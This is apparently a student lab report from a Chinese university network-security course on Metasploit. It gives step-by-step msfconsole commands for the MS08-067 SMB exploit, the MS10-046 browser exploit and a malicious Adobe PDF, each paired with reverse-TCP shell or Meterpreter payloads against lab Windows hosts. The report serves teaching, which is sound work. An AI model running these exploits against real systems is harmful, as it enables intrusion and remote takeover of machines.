2018-2019-2 20165209 《网络对抗技术》Exp5:MSF基础应用
2018-2019-2 20165209 《网络对抗技术》Exp5:MSF基础应用
目录
- 一、基础问题回答和实验内容
- 二、攻击实例
- 三、实验中遇到的问题及解决方案
- 四、实验总结
一、基础问题回答和实验内容
1.基础问题回答
用自己的话解释什么是exploit,payload,encode.
exploit:漏洞攻击,一个exploit程序肯定会触发系统的一个或多个漏洞,进而程序直接获取到目标系统的部分或所有权限。
payload:搞破坏的关键代码。
encode:保证payload不出现特定字符,避免被查杀。
实验内容
任务一:一个主动攻击实践,如ms08_067。
任务二: 一个针对浏览器的攻击,如ms11_050。
任务三: 一个针对客户端的攻击,如Adobe。
任务四: 成功应用任何一个辅助模块。
二、攻击实例
1.主动攻击实践,实现ms08_067
靶机:Microsoft Windows 2000(192.168.1.218)
payload :generic/shell_reverse_tcp
实验步骤
==首先要把靶机和攻击者的连接方式都改为桥接!!==
- 输入
msfconsole打开metasploit控制台 - 输入
use exploit/windows/smb/ms08_067_netapi使用ms08_067漏洞攻击方式 - 输入
set payload generic/shell_reverse_tcp以shell反向tcp连接为有效载荷 - 输入
set RHOST 192.168.1.218ip为靶机的IP - 输入
set LHOST 192.168.1.182ip为攻击者的IP - 输入
set target 0设置目标,0为无差别攻击 输入
exploit开始攻击
攻击浏览器实践,ms10_046漏洞攻击
靶机:Microsoft Windows XP SP3(English)
payload :windows/meterpreter/reverse_tcp
实验步骤
- 输入
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用浏览器漏洞 - 输入
set payload windows/meterpreter/reverse_tcp选择反向链接载荷 - 输入
set SRVHOST 192.168.1.182设置服务器IP(攻击者IP) - 输入
set LHOST 192.168.1.182设置攻击者IP - 输入
exploit开始攻击
- 在win xp sp3的浏览器中访问刚刚设置的服务器IP
http://192.168.1.182弹出如下窗口
- 同时攻击者会开始监听并与靶机建立连接。
输入
sessions查看有多少主机被反向链接到攻击者和靶机对应的序号。输入
sessions -i 2控制靶机(-i后面的数即为靶机对应的序号)
攻击客户端实践,实现Adobe
靶机:Windows XP sp3(192.168.1.139)
实验步骤
- 输入
use windows/fileformat/adobe_cooltype_sing使用漏洞 - 输入
set payload windows/meterpreter/reverse_tcp选择攻击载荷 - 输入
set LHOST 192.168.1.182为攻击者IP - 输入
set FILENAME 20165209.pdf设置生成pdf文件的文件名 - 输入
exploit开始攻击
- 将生成的
20165209.pdf复制到Windows XP中 - 输入
back退出当前模块 - 输入
use exploit/multi/handler进入监听模块 - 输入
set payload windows/meterpreter/reverse_tcp选择攻击载荷 - 输入
set LHOST 192.168.1.182为攻击者IP - 输入
exploit开始攻击 - 在靶机中打开
20165209.pdf,攻击成功
成功攻击一个辅助模块,实现网段扫描(唯一)
靶机:
实验步骤
- 输入
show auxiliary查看所有的辅助模块
- 输入
info scanner/steam/server_info查看模块信息,请求从服务器获取信息,扫描范围默认为10(从起始地址开始往后扫10个),端口固定为UDP端口27015。端口27015只是用作输入/输出的通信端口。
- 输入
use scanner/steam/server_info使用漏洞
- 输入
set RHOSTS 192.168.1.180为起始IP
- 输入
exploit开始攻击
(果不其然,这个网段里木有服务器,sang~)
三、实验中遇到的问题及解决方案
1.armitage无法开启,出现错误提示如下图
- 参考了一篇博客里面解释了很多,具体的操作如下
1 输入 /etc/init.d/postgresql start 启动postgresql数据库;
2 输入 msfdb init 初始化MSF数据库(关键步骤);
3 输入 msfconsole 运行msfconsole;
#4 输入 db_status 在msf中查看数据库连接状态。
- 在显示
Connected to msf. Connection type: postgresql.之后,再次输入armitage即可开启成功。
四、实验总结
1.实验总结与体会
实验最痛苦的就是明明和大家做的一样,但是我的就是无法攻击成功。通过实验掌握了msf的简单操作,始终牢记不懂就help,不知道是干什么的就info,看不懂就有道的宗旨,还是有些收获的,有些快乐。
2.离实战还缺些什么技术
觉得差的也不多,也就一个大神的距离吧。通过在网络上捕包反查IP,并且攻击。类似这种步骤中的功能,我目前只能在已知的情况下,进行强迫式攻击(就是硬生生让舍友拷一下)。
2018-2019-2 20165209 《网络对抗技术》Exp5:MSF基础应用的更多相关文章
- 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础
2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155232《网络对抗》Exp5 MSF基础应用
20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...
- 20155302《网络对抗》Exp5 MSF基础应用
20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...
- 20155323刘威良《网络对抗》Exp5 MSF基础应用
20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...
- 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用
20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验 (首用) 渗透实验三:Adobe ...
- 20145215《网络对抗》Exp5 MSF基础应用
20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...
- 20145208 蔡野 《网络对抗》Exp5 MSF基础应用
20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...
- 20145311王亦徐 《网络对抗技术》 MSF基础应用
20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...
- 20145325张梓靖 《网络对抗技术》 MSF基础应用
20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...
随机推荐
- shell脚本中对简单实现对log的处理
用shell在写小程序时,log没用像python样用logging模块可以直接使用,下面我们就简单写下用shell函数来实现log分级 #/bin/bash sys_log="/var/l ...
- html如何引用另一个html的内容
第一种:使用jquery: https://api.jquery.com/load/ 这可以加载html中某个id的元素 $( "#result" ).load( "aj ...
- iOS - Charles抓包数据
一.Charles Charles破解版下载地址点我 1.1 Charles主要的功能 .截取Http.Https网络请求内容 .支持修改网络请求参数,方便调试 .支持网络请求的截取 并动态修改 1. ...
- python---修改编辑器的配色和字体大小
因为习惯黑色的背景,所以必须修改成对应的配色: 在这里设置theme: 设置字体大小: 找到Font,这里设置字体大小,首先要Scheme 后 进行 Save as 操作后,才能设置 Size ,设置 ...
- java 类中的细节
java 中类: 类是用于描述统一类型的对象的一个抽象的概念,类中定义了这一类对象所因具有的静态和动态属性. 举例: 瓶子静态: 有一个口.长长的形状-->java类中的成员变量动态属性: 可以 ...
- 停机问题(英语:halting problem)是逻辑数学中可计算性理论的一个问题。通俗地说,停机问题就是判断任意一个程序是否能在有限的时间之内结束运行的问题。该问题等价于如下的判定问题:是否存在一个程序P,对于任意输入的程序w,能够判断w会在有限时间内结束或者死循环。
htps://baike.baidu.com/item/停机问题/4131067?fr=aladdin 理发师悖论:村子里有个理发师,这个理发师有条原则是,对于村里所有人,当且仅当这个人不自己理发,理 ...
- 它是对 ACME(automated certificate management environment) 协议的实现,只要实现了 ACME 协议的客户端都可以跟它交互。
它是对 ACME(automated certificate management environment) 协议的实现,只要实现了 ACME 协议的客户端都可以跟它交互. https://mp.we ...
- Alisha’s Party---hdu5437(模拟+优先队列)
题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=5437 题意:公主有k个朋友来参加她的生日party,每个人都会带价值为v[i]的礼物过来,在所有人到齐 ...
- ansible-playbook剧本
Playbooks 是一种简单的配置管理系统与多机器部署系统的基础, 非常适合于复杂应用的部署 由 yaml 语言编写, 运行过程中, ansible-playbook 命令根据自上而下的顺序依次执行 ...
- Java-idea-eclipse-快捷键【mac,win】
Mac键盘符号和修饰键说明 ⌘ Command ⇧ Shift ⌥ Option ⌃ Control ↩︎ Return/Enter ⌫ Delete ⌦ 向前删除键(Fn+Delete) ↑ 上箭头 ...
靶机:
实验步骤
- 输入
show auxiliary查看所有的辅助模块 - 输入
info scanner/steam/server_info查看模块信息,请求从服务器获取信息,扫描范围默认为10(从起始地址开始往后扫10个),端口固定为UDP端口27015。端口27015只是用作输入/输出的通信端口。
- 输入
use scanner/steam/server_info使用漏洞 - 输入
set RHOSTS 192.168.1.180为起始IP - 输入
exploit开始攻击
(果不其然,这个网段里木有服务器,sang~)
三、实验中遇到的问题及解决方案
1.armitage无法开启,出现错误提示如下图
- 参考了一篇博客里面解释了很多,具体的操作如下
1 输入 /etc/init.d/postgresql start 启动postgresql数据库;
2 输入 msfdb init 初始化MSF数据库(关键步骤);
3 输入 msfconsole 运行msfconsole;
#4 输入 db_status 在msf中查看数据库连接状态。
- 在显示
Connected to msf. Connection type: postgresql.之后,再次输入armitage即可开启成功。
四、实验总结
1.实验总结与体会
实验最痛苦的就是明明和大家做的一样,但是我的就是无法攻击成功。通过实验掌握了msf的简单操作,始终牢记不懂就help,不知道是干什么的就info,看不懂就有道的宗旨,还是有些收获的,有些快乐。
2.离实战还缺些什么技术
觉得差的也不多,也就一个大神的距离吧。通过在网络上捕包反查IP,并且攻击。类似这种步骤中的功能,我目前只能在已知的情况下,进行强迫式攻击(就是硬生生让舍友拷一下)。
2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...
20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...
20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...
20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验 (首用) 渗透实验三:Adobe ...
20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...
20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...
20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...
20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...
用shell在写小程序时,log没用像python样用logging模块可以直接使用,下面我们就简单写下用shell函数来实现log分级 #/bin/bash sys_log="/var/l ...
第一种:使用jquery: https://api.jquery.com/load/ 这可以加载html中某个id的元素 $( "#result" ).load( "aj ...
一.Charles Charles破解版下载地址点我 1.1 Charles主要的功能 .截取Http.Https网络请求内容 .支持修改网络请求参数,方便调试 .支持网络请求的截取 并动态修改 1. ...
因为习惯黑色的背景,所以必须修改成对应的配色: 在这里设置theme: 设置字体大小: 找到Font,这里设置字体大小,首先要Scheme 后 进行 Save as 操作后,才能设置 Size ,设置 ...
java 中类: 类是用于描述统一类型的对象的一个抽象的概念,类中定义了这一类对象所因具有的静态和动态属性. 举例: 瓶子静态: 有一个口.长长的形状-->java类中的成员变量动态属性: 可以 ...
htps://baike.baidu.com/item/停机问题/4131067?fr=aladdin 理发师悖论:村子里有个理发师,这个理发师有条原则是,对于村里所有人,当且仅当这个人不自己理发,理 ...
它是对 ACME(automated certificate management environment) 协议的实现,只要实现了 ACME 协议的客户端都可以跟它交互. https://mp.we ...
题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=5437 题意:公主有k个朋友来参加她的生日party,每个人都会带价值为v[i]的礼物过来,在所有人到齐 ...
Playbooks 是一种简单的配置管理系统与多机器部署系统的基础, 非常适合于复杂应用的部署 由 yaml 语言编写, 运行过程中, ansible-playbook 命令根据自上而下的顺序依次执行 ...
Mac键盘符号和修饰键说明 ⌘ Command ⇧ Shift ⌥ Option ⌃ Control ↩︎ Return/Enter ⌫ Delete ⌦ 向前删除键(Fn+Delete) ↑ 上箭头 ...